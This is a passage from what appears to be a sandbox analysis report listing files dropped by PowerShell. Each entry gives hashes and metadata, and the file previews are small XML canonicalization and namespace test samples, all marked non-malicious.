                                                                                                                                                                                                                      Preview:<a:foo xmlns:a="http://a" xmlns:b="http://b" xmlns:child="http://c" xmlns:soap-env="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/2001/XMLSchema">.. <a:bar>xsd:string</a:bar>.. <dsig2:IncludedXPath xmlns:dsig2="http://www.w3.org/2010/xmldsig2#">/soap-env:body/child::b:foo[@att1 != "c:val" and @att2 != 'xsd:string']</dsig2:IncludedXPath>..</a:foo>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):88
                                                                                                                                                                                                                      Entropy (8bit):4.403637693403381
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:XIFgNAfUvNAcHMb823Uq6moJMCy:igNAUCcHC8xm0y
                                                                                                                                                                                                                      MD5:BFDB939589F421147929A66BD0D32983
                                                                                                                                                                                                                      SHA1:20F8A33D7F78B7C7C6DEFA47081A09F60132A943
                                                                                                                                                                                                                      SHA-256:4BE10C057C3A93A6B3BE470ACF554AAD2B890BA49689ACFF1A67A952274CFCCC
                                                                                                                                                                                                                      SHA-512:A465ED380D0312D0890428A788D8FF8CFED89C480E630AE01ED9BAC183C75994B4FA497351F0BDB6B9CB463C012D6FB1E1C9ACF38C97ED37ED5D1D1495D3FC1D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo xmlns:a="http://a" xmlns:b="http://b">.. <b:bar b:att1="val" att2="val"/>..</foo>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):133
                                                                                                                                                                                                                      Entropy (8bit):4.378583804486025
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:0XKFgNAfUvNAcHn0LvdsdCQobHcQobHcQobEfb3Uq1M1Nun:0IgNAUCcHn0b+dC9A9A9g8u
                                                                                                                                                                                                                      MD5:B7201E3F0D3C9BB5400532953C9ABB2E
                                                                                                                                                                                                                      SHA1:AFF67B9F14B80896713068F24C3DB7A4047780F6
                                                                                                                                                                                                                      SHA-256:9B52211D85D53B8F8980993D6FC9CB2F91D0A5AB20A23177A6F480814F2D1158
                                                                                                                                                                                                                      SHA-512:96AE8F8334E4E1FCABDB59F7390609A5F2C9465554AF65E3CCC8496FAC91EB2085B43CBF4741ADBB1ABFDD7EA209DFE68F3B4432495984EC752AA11392B4798A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<a:foo xmlns:a="http://a" xmlns:b="http://b" xmlns:c="http://c">.. <b:bar/>.. <b:bar/>.. <b:bar/>.. <a:bar b:att1="val"/>..</a:foo>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):180
                                                                                                                                                                                                                      Entropy (8bit):4.465003476466694
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:XIFgNAEWlSvNAEXAERyqPHsRxqT0bSbk0DmEVHIFgNAEXAERyqPHsRxqT0FKF7NS:igNAEguCEXAEkFxH+bVmEVHI2NAEXAEW
                                                                                                                                                                                                                      MD5:E2A917A1895FE291D952A7CE7AAB3997
                                                                                                                                                                                                                      SHA1:59361CF9F0BE5023302E088831F01E91E7E531C5
                                                                                                                                                                                                                      SHA-256:E35CC84F0C21780237580CE3A851292DA017D01D577BD661681A2C51CEB5D93F
                                                                                                                                                                                                                      SHA-512:07C333965E769491AAEE30D05C25E321AC94EDDFAEBDD226FD5559EAD62FFAF5BC740F42F5DCDA787639648C7F24E2F0B95B054C4A88749BBE2079FED052EB94
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo xmlns:a="http://z3" xmlns:b="http://z2" a:att1="val1" b:att2="val2"> .. <bar xmlns="http://z0" xmlns:a="http://z2" a:att1="val1" b:att2="val2" xmlns:b="http://z3" />..</foo>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):177
                                                                                                                                                                                                                      Entropy (8bit):4.585640572439389
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:0XKFgNAEWlSvNAEXGkqPGwZp4xqT0FKFvEUHItRziEVsvFZIHEaMbGfHEVqtzH3Y:0IgNAEguCEXGgAqxHIxEPtRziEVOjVi2
                                                                                                                                                                                                                      MD5:8700CE414B640538B0A459EAB5F1F131
                                                                                                                                                                                                                      SHA1:C98385228A209C60791DB7E45F78D7FE114553DC
                                                                                                                                                                                                                      SHA-256:8077EA09092BC8546E95C4778673ED0AC87FCE4ED334BD0D5C32DCCB3D81E80B
                                                                                                                                                                                                                      SHA-512:7C46E4CC16B967A557D0D176FC3E8688E8536F6965FD79BE9F177B5A9C5E58BE1D0F1E289EDB8B6C3F8A91473574936FE68E609C06F5328157B0C320DA99A8F1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<a:foo xmlns:a="http://z3" xmlns:b="http://z2" b:att1="val1" c:att3="val3" b:att2="val2" xmlns:c="http://z1" xmlns:d="http://z0">.. <c:bar/>.. <c:bar d:att3="val3"/>..</a:foo>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):198
                                                                                                                                                                                                                      Entropy (8bit):4.57662640864214
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:igNAEVHItCEVSFxHI9mEVBob9lNAEVHIxEVPynKRziEVky:igRVHIfVv9Veb9lRVHIeVPynOxVky
                                                                                                                                                                                                                      MD5:46404D993CA449BD665C12261DDFF37B
                                                                                                                                                                                                                      SHA1:F97448E5C8ACE47CC19F6C4E6802DCE1C240DE76
                                                                                                                                                                                                                      SHA-256:F326830B3AF1684AB311104DD5D1FC69C3EC365875C7AFD3F14211AC2BDABC13
                                                                                                                                                                                                                      SHA-512:A8E34FCD279C80F8EF910E7B0FAFFDA8988A6CB0D98FDB5A6914289299682C087E92A6C85D3A1B6CA23EDD0759484A275BFB210896D63051BD43C3595A4CD1D3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo xmlns:a="http://z0" xmlns:b="http://z0" a:att1="val1" b:att2="val2" xmlns="http://z0"> .. <c:bar xmlns:a="http://z0" xmlns:c="http://z0" c:att3="val3"/>.. <d:bar xmlns:d="http://z0"/>..</foo>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):185
                                                                                                                                                                                                                      Entropy (8bit):5.085990875509101
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:XIFvDmEVHIRE7MKf6ZWk4XViJS4RKbuviyiFdy6tViJS4RKbu4Ukeqy:i7mEVHIK7MKfRVic4subinPic4s1Ukej
                                                                                                                                                                                                                      MD5:681328C73FC205D6BB11E7FD63807DFC
                                                                                                                                                                                                                      SHA1:BA7BA520F6B9DCEDCFD86698F85FA7AA2C6B30A3
                                                                                                                                                                                                                      SHA-256:EE61CFCACBC472ED3BC0E2E5CA59D93AC0FBC9D9360AEA1EEE6FAFE20884A6C3
                                                                                                                                                                                                                      SHA-512:7CC4882EAA9BE39DD1A57C63F7DAF18568756726E513EED4FFC528469AA11EBEE1C85E3F01308EFC8A09A96B34354B9DD2E0B0C1ED80C8C32E3F07CF43A15BDB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo xmlns="http://z0" xml:id="23">.. <bar xsi:type="xsd:string" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">data</bar>..</foo>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:XML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):161
                                                                                                                                                                                                                      Entropy (8bit):4.744910727482161
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:vIWjkxWCOIsRAd8WDadGbtAJJA/MIj2VJSMrLRIBERYvTI0RgrTIxn:Q1xWCibYadGbtoKMM2VJnFY7/R6sn
                                                                                                                                                                                                                      MD5:A6A424625469452EB87E5799FE939851
                                                                                                                                                                                                                      SHA1:B2E132F08185C89C851F9C6D686C824C0456DDCF
                                                                                                                                                                                                                      SHA-256:291106FB290AF960B199951F0F39F92E7106A07D92E5B3A51837723B819E43D6
                                                                                                                                                                                                                      SHA-512:0B31B14F176895522515A2F7441EC8A96E62C88A73BDFB47E04B986C6CD544E0CD09E1DBEC194A6194569714708BCDC9D46A374E858E301A7BABC5533DAB34C2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml-stylesheet href="doc.xsl".. type="text/xsl" ?>..<doc>Hello, world! Comment 1 --></doc>..<?pi-without-data?>.. Comment 2 -->.. Comment 3 -->
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:XML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):103
                                                                                                                                                                                                                      Entropy (8bit):4.723424586422175
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:vIWjkxWCOIsRAd8WDadGbtAJJA/JKCVJSMrLRIBER3:Q1xWCibYadGbtoKECVJnF3
                                                                                                                                                                                                                      MD5:B3EE207F21461A187DE2631B5B1F5C26
                                                                                                                                                                                                                      SHA1:12660BCE1798D20DD61208A1395234A1A1899DE6
                                                                                                                                                                                                                      SHA-256:3E105A9DA8ACDCDDD6D71EF5FE084D755EC93335094E73115D944993A753C938
                                                                                                                                                                                                                      SHA-512:FFF98F57F91D3E7D6348177D6331EF630E10A707D660FF6026173A799071B05CECF98CF2E833F1C8748B53F037E74F43B9DB6EE7304782895E4F45875C494F1D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml-stylesheet href="doc.xsl".. type="text/xsl" ?>..<doc>Hello, world!</doc>..<?pi-without-data?>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                      Entropy (8bit):3.5678574039997435
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Qje1YFj6Bq0NBB5FjIbodFFFJ01YF/a8Bq0NBB5F/d/xckMBKXbn:Me1YFj6gqxmodF/J01YF/a8gqtd/RMBu
                                                                                                                                                                                                                      MD5:5A38D9B0860136CE4C052D78CDC0001F
                                                                                                                                                                                                                      SHA1:394FFCD1E2AE967C3E4F4441B1002573E977264E
                                                                                                                                                                                                                      SHA-256:510B38F8B7494160E535FA034E607281E1761F5160EF72725CDE5CDF8110C85A
                                                                                                                                                                                                                      SHA-512:6E7EAD4D0095C7710A667291947B74935E3BD85938E682BDE497783BC730A22D1DB49E03A5DDB57EBEBC59D3713D3A1FE9CB4C9113BA38E819838FAF79EA0E09
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc>.. <clean> </clean>.. <dirty> A B </dirty>.. <mixed>.. A.. <clean> </clean>.. B.. <dirty> A B </dirty>.. C.. </mixed>..</doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):99
                                                                                                                                                                                                                      Entropy (8bit):4.0930157105516365
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:2dtFk/FPQGftZ/MXRcbk/F9xxB9BM:itFIQqtZ/MXw27M
                                                                                                                                                                                                                      MD5:22A639E98739A4AF59E1628761ABFDA0
                                                                                                                                                                                                                      SHA1:966BCE2B834B61C13D1291C1D84128AD2756D748
                                                                                                                                                                                                                      SHA-256:A8218EA3D5E7BF22EA6751CA3E87C5A9F02DB45EB9753025E7BAA569BB0E1C62
                                                                                                                                                                                                                      SHA-512:6A295B7F391E6BED5D738D59C647D1F632DE6895B33A531AA1220AC692035D6FF83CD46F2CBB614C4B41C3555CD3384192E75906756DD308C65B0312324F6DA0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc><clean></clean><dirty>A B</dirty><mixed>A<clean></clean>B<dirty>A B</dirty>C</mixed></doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                      Entropy (8bit):4.607250919406405
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:Md57LkGRplRDBji1DXQrbxXfd4hyEvNINHhb:Md57LTRprD1iZXObxikZhb
                                                                                                                                                                                                                      MD5:07779D5FD3CBEBEACD26EE184A70A01D
                                                                                                                                                                                                                      SHA1:A60F95B90F50E240767FD834A76EB93518E85832
                                                                                                                                                                                                                      SHA-256:E625D363CB7559A4469DE8B679E92E54788EAE50152093F5BA869CF9E0297E1D
                                                                                                                                                                                                                      SHA-512:716DEB91A7B495E5F8ABD5B41125E46CADC7D997201A98983F8B39B8B799AD3DCDD0651FB8053B160C1BE2C316EE5F51B96F1F695A4A910CDF270E4CBE515D43
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc>.. <e1></e1>.. <e2></e2>.. <e3 id="elem3" name="elem3"></e3>.. <e4 id="elem4" name="elem4"></e4>.. <e5 xmlns="http://example.org" xmlns:a="http://www.w3.org" xmlns:b="http://www.ietf.org" attr="I'm" attr2="all" b:attr="sorted" a:attr="out"></e5>.. <e6>.. <e7 xmlns="http://www.ietf.org">.. <e8 xmlns="">.. <e9 attr="default"></e9>.. </e8>.. </e7>.. </e6>..</doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):491
                                                                                                                                                                                                                      Entropy (8bit):4.680249750237811
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:S/OfdDJbXR/jgMuhXlqruzihR+J8Rq6QY:S/OfdDJbXRLgMQXlqru27w6H
                                                                                                                                                                                                                      MD5:95987C02559DF11B47ED373AC482C5B1
                                                                                                                                                                                                                      SHA1:4ECA6AC6F711B01A7F3B3AF0A9C986F0CF928C4E
                                                                                                                                                                                                                      SHA-256:D6FF659C93CD30811F2B67AC08F128139293C55F36EBB00804E66B9A8BBF4670
                                                                                                                                                                                                                      SHA-512:57079154FE0357E35CA6FD69A4BBC03D863227EB090DECF6C2D943501EBD94574618992454EEFED16D6C60D9F666564808E27A3E99147A2DB378518FFFC874B6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n0:doc xmlns:n0="">.. <n0:e1></n0:e1>.. <n0:e2></n0:e2>.. <n0:e3 id="elem3" name="elem3"></n0:e3>.. <n0:e4 id="elem4" name="elem4"></n0:e4>.. <n1:e5 xmlns:n1="http://example.org" xmlns:n2="http://www.ietf.org" xmlns:n3="http://www.w3.org" attr="I'm" attr2="all" n2:attr="sorted" n3:attr="out"></n1:e5>.. <n0:e6>.. <n2:e7 xmlns:n2="http://www.ietf.org">.. <n0:e8>.. <n0:e9 attr="default"></n0:e9>.. </n0:e8>.. </n2:e7>.. </n0:e6>..</n0:doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (329), with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                      Entropy (8bit):4.749803331481254
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:DbLLZJJrCRRGd3KmSnNAc4sPCc4CX61e4JrR7gIImc4ygIZDK5Iu:HLLZDK1DXQrRIv9K5Iu
                                                                                                                                                                                                                      MD5:863973CDB4A3DB91D2BB760810A28273
                                                                                                                                                                                                                      SHA1:5C4A059E128E7F2E3ADADAAF38B3AB1C6B8E5B0C
                                                                                                                                                                                                                      SHA-256:4BA7229217F0A95904BD6AD456A75B35F3938052546E10A8B9E30FF85EB82CFA
                                                                                                                                                                                                                      SHA-512:010B7A16CA5EEBBA4F378C49963C4A5AB9CBED13ABC521BCE3C9B42C7266BF66BAE7F4B5B808EA45E852FF20AFB66CA47FE1B5F1F252E074C1A61B14F4265BFA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc><e1></e1><e2></e2><e3 id="elem3" name="elem3"></e3><e4 id="elem4" name="elem4"></e4><e5 xmlns="http://example.org" xmlns:a="http://www.w3.org" xmlns:b="http://www.ietf.org" attr="I'm" attr2="all" b:attr="sorted" a:attr="out"></e5><e6><e7 xmlns="http://www.ietf.org"><e8 xmlns=""><e9 attr="default"></e9></e8></e7></e6></doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                                                                      Entropy (8bit):4.9080687121343
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:Mml8dI7bmdo0/5ezPfDyVAvGLmbphMD4MPIVsMLcR3F55rnbOyVRRIBkzWKYuDVC:Mqme0UPWAv6mtO8V5c/5NS2RRcZJ87eb
                                                                                                                                                                                                                      MD5:F1FBDEE5CC9F7E7AC4BC255EA03FD4AE
                                                                                                                                                                                                                      SHA1:257C36B7AACCA5A8CF372F88A13425059312CB34
                                                                                                                                                                                                                      SHA-256:520BF3C6F1C987B1F5F3FF54A4F78D71905E24C25AE993DA1D8D6FBE2BB6CBD2
                                                                                                                                                                                                                      SHA-512:DE645CEE4184292AC940FE0502DFE2BAC4D0995238B9EFC5CCAEBDDCAF48BEF3EFF6FC35F7551B8D4968B8F8B6FFB250552AB895414392A5DDAF169F74E78CE1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc>.. <text>First line&#xD;..Second line</text>.. <value>2</value>.. <compute>value&gt;"0" &amp;&amp; value&lt;"10" ?"valid":"error"</compute>.. <compute expr="value>&quot;0&quot; &amp;&amp; value&lt;&quot;10&quot; ?&quot;valid&quot;:&quot;error&quot;">valid</compute>.. <norm attr=" ' &#xD;&#xA;&#x9; ' "></norm>.. <normNames attr="A &#xD;&#xA;&#x9; B"></normNames>.. <normId id="' &#xD;&#xA;&#x9; '"></normId>..</doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):403
                                                                                                                                                                                                                      Entropy (8bit):4.909718049988162
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:418dI7bmdXq5e2fDyVAvMTdbphMD4MPIVsqY+R3F55rnb8VRRIBkzWKY9s8WhkPt:4FmcWAvMTdtO8Vm+/5NMRRcZJ9sst
                                                                                                                                                                                                                      MD5:8185B4C8AEFFD70982BCF14F41B51220
                                                                                                                                                                                                                      SHA1:BADAA1FE3F6763C7E23B3A986212E8DC6A67B4B6
                                                                                                                                                                                                                      SHA-256:11909EC64C09D0AF758E0C3660026E21E8E69DBDBD914558080C8CF3E369E1F5
                                                                                                                                                                                                                      SHA-512:5345AB05FF4B8C896F219754CB852B8F767A2879A9A2AB149EC032E495FC384B492CE2AED9DB78C7CAF6B7453A522FE8A5980E21D03BA0183BB5A6A35DFFDC23
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc><text>First line&#xD;..Second line</text><value>2</value><compute>value&gt;"0" &amp;&amp; value&lt;"10" ?"valid":"error"</compute><compute expr="value>&quot;0&quot; &amp;&amp; value&lt;&quot;10&quot; ?&quot;valid&quot;:&quot;error&quot;">valid</compute><norm attr=" ' &#xD;&#xA;&#x9; ' "></norm><normNames attr="A &#xD;&#xA;&#x9; B"></normNames><normId id="' &#xD;&#xA;&#x9; '"></normId></doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):51
                                                                                                                                                                                                                      Entropy (8bit):4.311953224613571
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Qx8g6LmZX/Z4dbn:bLmZvZmbn
                                                                                                                                                                                                                      MD5:82DF1EFF37190359BF8214E6531314E7
                                                                                                                                                                                                                      SHA1:B4ABF3F517A54E9C7CD8905877C7152AAD84DC75
                                                                                                                                                                                                                      SHA-256:E260B822EF9F1D512EB00387DD516F1908F37DF0B540A537BB81836A0FB7308E
                                                                                                                                                                                                                      SHA-512:21191E0E3717B5448EFEF8C038CEF4A86A98EA706E78B66F857CA01B317EF216E4F14F0B1BD00BD0D5542DB73020E71E5835C49C87BD465A22772AE73647A891
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc attrExtEnt="entExt">.. Hello, world!..</doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):44
                                                                                                                                                                                                                      Entropy (8bit):4.191830766118721
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Qx8g6LOJ6/JKM:bLOJsEM
                                                                                                                                                                                                                      MD5:453801EAB144EEEE8F471DCDCE8876DD
                                                                                                                                                                                                                      SHA1:70A322C0DE4A3DAA6498AFBE5A351DA15FE47E03
                                                                                                                                                                                                                      SHA-256:8EE74F8F57B14046DE318A09BD50D3812F1B9EEAF6ACB4970205831D3BA2B573
                                                                                                                                                                                                                      SHA-512:B56D9A72E50CDDFA82F8D513513A112DB5992272DE6EF7DC3A4191F461F7ED3DA3AA4D2EC7A59ACC4CA3A7784FEE82B7A9A13DCF373B1C1F052D0A4934523D5F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc attrExtEnt="entExt">Hello, world!</doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                      Entropy (8bit):2.931208948910323
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:xn:xn
                                                                                                                                                                                                                      MD5:28485DB5B2F33AB50CB63E14586F3B76
                                                                                                                                                                                                                      SHA1:61D15497106A9B539A4CC87A555D87E1C968D82A
                                                                                                                                                                                                                      SHA-256:B2441309CD4B9608C8260766F0C6CD6272C610F319282CE07E2401BF1CADCEC4
                                                                                                                                                                                                                      SHA-512:6E150DFB5903595479FF27C74148F4A72F48EDBF374C66FE17B5221D1ACA356CE4115FBC0F315162D159C7290070AFCFC887F174CC997F615A323963347C0240
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc>.</doc>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):228
                                                                                                                                                                                                                      Entropy (8bit):5.1161207379868685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:0IgNA0F62EJsHObc4sSJMAiIXwBuQRPG1tHcb:DgvBWsHEeAiam4HHcb
                                                                                                                                                                                                                      MD5:044F4CC895A06CE14BCD271B266BC61B
                                                                                                                                                                                                                      SHA1:28633845B445538328E999639194B6BA9A046494
                                                                                                                                                                                                                      SHA-256:FAC83A808E11B23FAE4138C1665D632BDDDCCAD0A739E9A09AF22892205B2F14
                                                                                                                                                                                                                      SHA-512:878E67CFDEFE6DAB9C968F1FE3476E5F88FF0BEB024D0EA8B532413C9DD8E3ADC2D0B86028EEB0BEC283ECAF63ADDC0A4BD1F75B8FCC3F851A86D89D180759AE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<a:foo xmlns:a="http://a">.. <a:bar>xsd:string</a:bar>.. <dsig2:IncludedXPath xmlns:dsig2="http://www.w3.org/2010/xmldsig2#">/soap-env:body/child::b:foo[@att1 != "c:val" and @att2 != 'xsd:string']</dsig2:IncludedXPath>..</a:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                      Entropy (8bit):5.128258583362646
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:mpWzAc4s1dEcGeLQmcHn0QmUnWboo9ic4sSJMLvByQRPG1aL1n:4LeLQlH0QKZSeh4wL1n
                                                                                                                                                                                                                      MD5:81DCC784ED653B3BE65ED522BF8DCA0D
                                                                                                                                                                                                                      SHA1:8A303FB2B5BF4691C29DAD3948DC9A62CE2276DC
                                                                                                                                                                                                                      SHA-256:47A4B32535B96B3993696BA36C8C2794EAE13209AA132147468A3575A2AB28CB
                                                                                                                                                                                                                      SHA-512:5D70B98484F90F65CBA5C14445CCA61CC5B41323A3E28271DC7306BB43EF66829C7FB8ECC57E80743513D39B1114D375F96B16899683F5DCD177E0B6F2BFAC65
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n0:foo xmlns:n0="http://a">.. <n0:bar xmlns:n1="http://www.w3.org/2001/XMLSchema">n1:string</n0:bar>.. <n4:IncludedXPath xmlns:n2="http://b" xmlns:n3="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:n4="http://www.w3.org/2010/xmldsig2#">/n3:body/child::n2:foo[@att1 != "c:val" and @att2 != 'xsd:string']</n4:IncludedXPath>..</n0:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):273
                                                                                                                                                                                                                      Entropy (8bit):5.185919736617327
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:0IgNAWic4s1r62EJsHObc4sSJMAiIXwBuQRPG1tHcb:DglxWsHEeAiam4HHcb
                                                                                                                                                                                                                      MD5:A6A4E1E95A46217C095A9D0A1C5323E6
                                                                                                                                                                                                                      SHA1:EDDEBCC976B2D4E16509ED1C5FC44C7E204315FD
                                                                                                                                                                                                                      SHA-256:F65573E52E2E3918861B2FF817A65E81D0C704180C4F01A6FE6F93DCB6C562DF
                                                                                                                                                                                                                      SHA-512:91DCDF0CD46589418EA30031FF6EC89F554BFB4CEDD4AB121151A494FA2FDC31E6D1F7AD46BDF16BB88EACDBCF80C6F444C664B70E0C040648463A64D6EA1434
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<a:foo xmlns:a="http://a">.. <a:bar xmlns:xsd="http://www.w3.org/2001/XMLSchema">xsd:string</a:bar>.. <dsig2:IncludedXPath xmlns:dsig2="http://www.w3.org/2010/xmldsig2#">/soap-env:body/child::b:foo[@att1 != "c:val" and @att2 != 'xsd:string']</dsig2:IncludedXPath>..</a:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):347
                                                                                                                                                                                                                      Entropy (8bit):5.125518747643533
